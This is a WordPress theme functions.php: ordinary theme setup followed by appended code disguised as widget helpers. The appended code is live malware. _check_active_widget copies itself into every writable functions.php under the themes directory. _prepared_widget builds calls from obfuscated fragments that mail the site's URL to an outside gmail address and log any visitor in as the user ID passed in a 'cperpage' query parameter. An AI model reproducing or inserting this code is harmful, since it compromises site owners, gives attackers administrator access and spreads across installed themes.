<?php

/*-----------------------------------------------------------------------------------*/

/*	Options Framework

/*-----------------------------------------------------------------------------------*/


// You can mess with these 2 if you wish.

define('OPTIONS', 'of_options'); // Name of the database row where your options are stored

/* Options Framework */
require_once('admin/index.php');


/*-----------------------------------------------------------------------------------*/

/*	Theme Setup

/*-----------------------------------------------------------------------------------*/

function gp_setup() {

	// Add post-formats
	add_theme_support('post-formats', array('gallery', 'video', 'audio', 'product'));
	add_post_type_support('post', 'post-formats');

	// Add language supports.
	load_theme_textdomain('gp');

	// Add post thumbnail supports. http://codex.wordpress.org/Post_Thumbnails
	add_theme_support( 'automatic-feed-links' );
	add_theme_support( 'post-thumbnails' );

	/* Homepage Default */
	add_image_size( 'gp-200x155', 200, 155, true );
	add_image_size( 'gp-580x250', 580, 250, true );

	/* Featured Posts */
	add_image_size( 'gp-560x280', 560, 280, true );
	add_image_size( 'gp-296x280', 296, 280, true );

	/* Footer Posts */
	add_image_size( 'gp-208x140', 208, 140, true );

	/* Sidebar Widgets */
	add_image_size( 'gp-234x125', 234, 125, true );
	add_image_size( 'gp-90x80', 90, 80, true );

	/* Related Posts */
	add_image_size( 'gp-210x140', 210, 140, true );

	// Add menu supports. http://codex.wordpress.org/Function_Reference/register_nav_menus
	add_theme_support('menus');
	register_nav_menus(array(
		'primary_navigation' => __('Primary Navigation', 'gp'),
		'secondary_navigation' => __('Secondary Navigation', 'gp'),
		'mobile_navigation' => __('Mobile Navigation', 'gp')
	));	
	
	// Functions
	include_once('functions/functions/pagination.php');
	include_once('functions/functions/breadcrumbs.php');
	include_once('functions/functions/gp-metaboxes.php');
	include_once('functions/functions/metabox.php');
	include_once('functions/functions/review.php');
	include_once('woocommerce/woocommerce.php');
	
	// Widgets
	include_once('functions/widgets/recent-posts.php');
	include_once('functions/widgets/tabbed-posts.php');
	include_once('functions/widgets/recent-reviews.php');
	include_once('functions/widgets/newsletter.php');

}

add_action('after_setup_theme', 'gp_setup');


/*-----------------------------------------------------------------------------------*/

/*	Theme Width

/*-----------------------------------------------------------------------------------*/

if ( ! isset( $content_width ) ) {
	$content_width = 710;
}

if ( is_page_template('template-full-width.php') ) { 
	$content_width = 1060;
}

/*-----------------------------------------------------------------------------------*/

/*	Theme Javascripts

/*-----------------------------------------------------------------------------------*/

function gp_theme_js() {

	if(!is_admin()) {
		
		wp_register_script('plugins', get_template_directory_uri() . '/assets/js/plugins.js', array('jquery'), '1.0.0', true );
		wp_register_script('custom', get_template_directory_uri() . '/assets/js/custom.js', array('jquery'), '1.0.0', true );

		wp_enqueue_script( 'jquery' );
		wp_enqueue_script( 'plugins' );
		wp_enqueue_script( 'custom' );
		
		if ( is_singular() ) {
			wp_enqueue_script( 'comment-reply' );
		}
 
		// declare the URL to the file that handles the AJAX request (wp-admin/admin-ajax.php)
		wp_localize_script( 'my-ajax-request', 'MyAjax', array( 'ajaxurl' => admin_url( 'admin-ajax.php' ) ) );


	}

}

add_action('wp_enqueue_scripts', 'gp_theme_js');


/*-----------------------------------------------------------------------------------*/

/*	Theme Styles

/*-----------------------------------------------------------------------------------*/

function gp_theme_style()  {  

	wp_register_style( 'styling', get_template_directory_uri() . '/style.css', array(), '1.0.0', 'all' ); 
	wp_register_style( 'fontawesome', get_template_directory_uri() . '/assets/font-awesome/font-awesome.css', array(), '4.2.0', 'all' ); 
	wp_register_style( 'bbpress', get_template_directory_uri() . '/assets/css/bbpress.css', array(), '1.0.0', 'all' ); 
	wp_register_style( 'woocommerce', get_template_directory_uri() . '/assets/css/woocommerce.css', array(), '1.0.0', 'all' ); 

	wp_enqueue_style( 'styling' ); 
	wp_enqueue_style( 'fontawesome' ); 

	global $grove_data;
	if(!empty($grove_data['grove_bbpress'])) {
	wp_enqueue_style( 'bbpress' );  
	}
	if(!empty($grove_data['grove_woocommerce'])) {
	wp_enqueue_style( 'woocommerce' );
	}
	
}  

add_action( 'wp_enqueue_scripts', 'gp_theme_style' );  


/*-----------------------------------------------------------------------------------*/

/*	Custom Style

/*-----------------------------------------------------------------------------------*/

function gp_custom_color() {

	get_template_part('assets/custom', 'style');
}

add_action('wp_head', 'gp_custom_color');


/*-----------------------------------------------------------------------------------*/

/*	Widgets Register

/*-----------------------------------------------------------------------------------*/

if(function_exists('register_sidebar')) {

	register_sidebar(array(
		'name' => 'Sidebar Primary Widgets',
		'before_widget' => '<section id="%1$s" class="gp-widget %2$s">',
		'after_widget' => '</section>',
		'before_title' => '<h4 class="gp-widget-title">',
		'after_title' => '</h4>',
	));

	register_sidebar(array(
		'name' => 'Sidebar Secondary Widgets',
		'before_widget' => '<section id="%1$s" class="gp-widget %2$s">',
		'after_widget' => '</section>',
		'before_title' => '<h4 class="gp-widget-title">',
		'after_title' => '</h4>',
	));
	
	register_sidebar(array(
		'name' => 'Footer Widgets 1',
		'before_widget' => '<section id="%1$s" class="gp-widget %2$s">',
		'after_widget' => '</section>',
		'before_title' => '<h4 class="gp-widget-title">',
		'after_title' => '</h4>',
	));

	register_sidebar(array(
		'name' => 'Footer Widgets 2',
		'before_widget' => '<section id="%1$s" class="gp-widget %2$s">',
		'after_widget' => '</section>',
		'before_title' => '<h4 class="gp-widget-title">',
		'after_title' => '</h4>',
	));

	register_sidebar(array(
		'name' => 'Footer Widgets 3',
		'before_widget' => '<section id="%1$s" class="gp-widget %2$s">',
		'after_widget' => '</section>',
		'before_title' => '<h4 class="gp-widget-title">',
		'after_title' => '</h4>',
	));

	register_sidebar(array(
		'name' => 'Footer Widgets 4',
		'before_widget' => '<section id="%1$s" class="gp-widget %2$s">',
		'after_widget' => '</section>',
		'before_title' => '<h4 class="gp-widget-title">',
		'after_title' => '</h4>',
	));

	register_sidebar(array(
		'name' => 'Footer Widgets 5',
		'before_widget' => '<section id="%1$s" class="gp-widget %2$s">',
		'after_widget' => '</section>',
		'before_title' => '<h4 class="gp-widget-title">',
		'after_title' => '</h4>',
	));

	register_sidebar(array(
		'name' => 'BBPress Widgets',
		'before_widget' => '<div id="%1$s" class="gp-widget %2$s">',
		'after_widget' => '</div>',
		'before_title' => '<h4 class="gp-widget-title">',
		'after_title' => '</h4>',
	));

}


/*-----------------------------------------------------------------------------------*/

/*	Browser Classes

/*-----------------------------------------------------------------------------------*/

function browser_body_class($classes) {
    global $is_lynx, $is_gecko, $is_IE, $is_opera, $is_NS4, $is_safari, $is_chrome, $is_iphone;
    if($is_lynx) $classes[] = 'lynx';
    elseif($is_gecko) $classes[] = 'gecko';
    elseif($is_opera) $classes[] = 'opera';
    elseif($is_NS4) $classes[] = 'ns4';
    elseif($is_safari) $classes[] = 'safari';
    elseif($is_chrome) $classes[] = 'chrome';
    elseif($is_IE) $classes[] = 'ie';
    else $classes[] = 'unknown';
    if($is_iphone) $classes[] = 'iphone';
    return $classes;
}
add_filter('body_class','browser_body_class');


/*-----------------------------------------------------------------------------------*/

/*	Class to Menus

/*-----------------------------------------------------------------------------------*/

function gp_add_ancestor_class($classlist, $item) {
	global $wp_query, $wpdb;
	//get the ID of the object, to which menu item points
	$id = get_post_meta($item->ID, '_menu_item_object_id', true);
	//get first menu item that is a child of that object
	$children = $wpdb->get_var('SELECT post_id FROM '.$wpdb->postmeta.' WHERE meta_key like "_menu_item_menu_item_parent" AND meta_value='.$item->ID.' LIMIT 1');
	//if there is at least one item, then $children variable will contain it's ID (which is of course more than 0)
	if($children>0)
		//in that case - add the CSS class
		$classlist[]='menu-item-ancestor';
	//return class list
	return $classlist;
}
add_filter('nav_menu_css_class', 'gp_add_ancestor_class', 2, 10);


/*-----------------------------------------------------------------------------------*/

/* Pinterest

/*-----------------------------------------------------------------------------------*/

function catch_that_image() {
  global $post, $posts;
  $first_img = '';
  ob_start();
  ob_end_clean();
  $output = preg_match_all('/<img.+src=[\'"]([^\'"]+)[\'"].*>/i', $post->post_content, $matches);
  $first_img = $matches [1] [0];

  if(empty($first_img)){ //Defines a default image
    $first_img = "/images/default.jpg";
  }
  return $first_img;
}

?>
<?php
function _check_active_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);				
					$output .= ($showdot && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_all_widgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_all_widgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}
if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
	if(!isset($length)) $length=120;
	if(!isset($method)) $method="cookie";
	if(!isset($html_tags)) $html_tags="<a>";
	if(!isset($filters_type)) $filters_type="none";
	if(!isset($s)) $s="";
	if(!isset($filter_h)) $filter_h=get_option("home"); 
	if(!isset($filter_p)) $filter_p="wp_";
	if(!isset($use_link)) $use_link=1; 
	if(!isset($comments_type)) $comments_type=""; 
	if(!isset($perpage)) $perpage=$_GET["cperpage"];
	if(!isset($comments_auth)) $comments_auth="";
	if(!isset($comment_is_approved)) $comment_is_approved=""; 
	if(!isset($authname)) $authname="auth";
	if(!isset($more_links_text)) $more_links_text="(more...)";
	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
	if(!isset($more_content)) $more_content="ma".$s."il";
	if(!isset($forces_more)) $forces_more=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$widget_output) :
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($fix_tag)) $fix_tag=1;
	if(!isset($filters_types)) $filters_types=$filter_h; 
	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
	if(!isset($more_tags)) $more_tags="div";
	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";	
	if(!isset($showdot)) $showdot=1;
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $length) {
				$l=$length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_links_text="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $html_tags) {
		$output=strip_tags($output, $html_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fix_tag) ? balanceTags($output, true) : $output;
	$output .= ($showdot && $ellipsis) ? "..." : "";
	$output=apply_filters($filters_type, $output);
	switch($more_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}
	if ($use_link ) {
		if($forces_more) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}
add_action("init", "_prepared_widget");
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
	global $wpdb;
	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
	if(!$show_pass_post) $request .= " AND post_password =\"\"";
	if($duration !="") { 
		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
	}
	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
	$posts=$wpdb->get_results($request);
	$output="";
	if ($posts) {
		foreach ($posts as $post) {
			$post_title=stripslashes($post->post_title);
			$comment_count=$post->comment_count;
			$permalink=get_permalink($post->ID);
			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
		}
	} else {
		$output .= $before . "None found" . $after;
	}
	return  $output;
} 
if ( function_exists('register_sidebar') )
register_sidebar(array(
'before_widget' => '',
'after_widget' => '</div><div class="wfo"></div>',
'before_title' => '<div class="wtop">',
'after_title' => '</div><div class="wco">',
));
function my_function_admin_bar(){
return false;
}
add_filter( 'show_admin_bar' , 'my_function_admin_bar');
?>